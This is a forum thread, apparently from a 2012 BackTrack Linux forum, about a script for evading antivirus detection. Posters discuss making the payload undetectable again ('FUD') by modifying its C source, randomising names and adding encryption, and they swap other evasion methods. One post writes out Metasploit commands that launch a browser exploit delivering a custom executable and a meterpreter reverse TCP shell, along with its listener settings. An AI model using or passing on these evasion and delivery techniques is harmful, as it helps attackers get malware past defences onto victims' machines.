
Thread: [script] for AV evasion

  1. #81
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    I'll look into it.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  2. #82
    Junior Member
    Join Date
    Jan 2010
    Posts
    40

    Default Re: [script] for AV evasion

    Thank you for your work on this script. Works great as a standalone executable. This may sound ignorant, but do you know any way to use the exe as a payload in Metasploit?

  3. #83
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: [script] for AV evasion

    Quote Originally Posted by thaijames View Post
    Thank you for your work on this script. Works great as a standalone executable. This may sound ignorant, but do you know any way to use the exe as a payload in Metasploit?

    set EXE::Custom whatevercustompayloadyouwant

  4. #84
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    1

    Default Re: [script] for AV evasion

    Scanned on NoVirusThanks, and Avira and BitDefender detect it.

  5. #85
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: [script] for AV evasion

    Quote Originally Posted by xiaobu View Post
    Scanned on NoVirusThanks, and Avira and BitDefender detect it.
    Hi, xiaobu ((OUT OF THREAD, sorry LHYX1!!!))
    Try this method; vs. "your list" of AVs it worked:
    http://www.backtrack-linux.org/forum...ad.php?t=48283
    bye

  6. #86
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    Scanned on NoVirusThanks, and Avira and BitDefender detect it.
    I think this is just signature-based detection.
    When I'm feeling like it, I'll change the C file a little and then it will be FUD again.
    Maybe I could also implement a stronger form of encryption like AES or RSC4.
    And I think I'm going to randomize all variable and function names.
    Last edited by LHYX1; 06-21-2012 at 04:53 AM.

  7. #87
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    5

    Default Re: [script] for AV evasion

    Except for the part regarding encryption, I've done it. But BitDefender still recognizes it. I'm gonna try what was suggested by zimmaro and I'll let you know

  8. #88
    Junior Member
    Join Date
    Jan 2010
    Posts
    40

    Default Re: [script] for AV evasion

    Thank you for your help.

    I tried the following:
    use exploit/windows/browser/msxml_get_definition_code_exec
    set EXE::Custom /root/test.exe
    set URIPATH test
    exploit -j

    When I access the generated link through a Windows browser, the above (zero day) exploit works fine; however, the payload is not my custom exe and gets detected by antivirus.
    When I run test.exe on the same Windows machine, no detection. So Metasploit must be using the default payload for this and not the custom exe?

    Or do I also need to set the payload options?

    current:
    Payload options (windows/meterpreter/reverse_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LHOST     192.168.0.150    yes       The listen address
    LPORT     4444             yes       The listen port


    Exploit target:

    Id  Name
    --  ----
    0   Automatic

    Thanks in advance.




    Quote Originally Posted by jnpa123 View Post
    set EXE::Custom whatevercustompayloadyouwant

  9. #89
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: [script] for AV evasion

    Quote Originally Posted by thaijames View Post
    Thank you for your help.

    I tried the following:
    use exploit/windows/browser/msxml_get_definition_code_exec
    set EXE::Custom /root/test.exe
    set URIPATH test
    exploit -j

    When I access the generated link through a Windows browser, the above (zero day) exploit works fine; however, the payload is not my custom exe and gets detected by antivirus.
    When I run test.exe on the same Windows machine, no detection. So Metasploit must be using the default payload for this and not the custom exe?

    Or do I also need to set the payload options?

    current:
    Payload options (windows/meterpreter/reverse_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LHOST     192.168.0.150    yes       The listen address
    LPORT     4444             yes       The listen port


    Exploit target:

    Id  Name
    --  ----
    0   Automatic

    Thanks in advance.
    I think some exploits don't support custom payloads. Use "show advanced" and check if EXE::Custom is available.

  10. #90
    Junior Member
    Join Date
    Jan 2010
    Posts
    40

    Default Re: [script] for AV evasion

    That is what I thought, thanks for confirming it.

    Quote Originally Posted by jnpa123 View Post
    I think some exploits don't support custom payloads. Use "show advanced" and check if EXE::Custom is available.
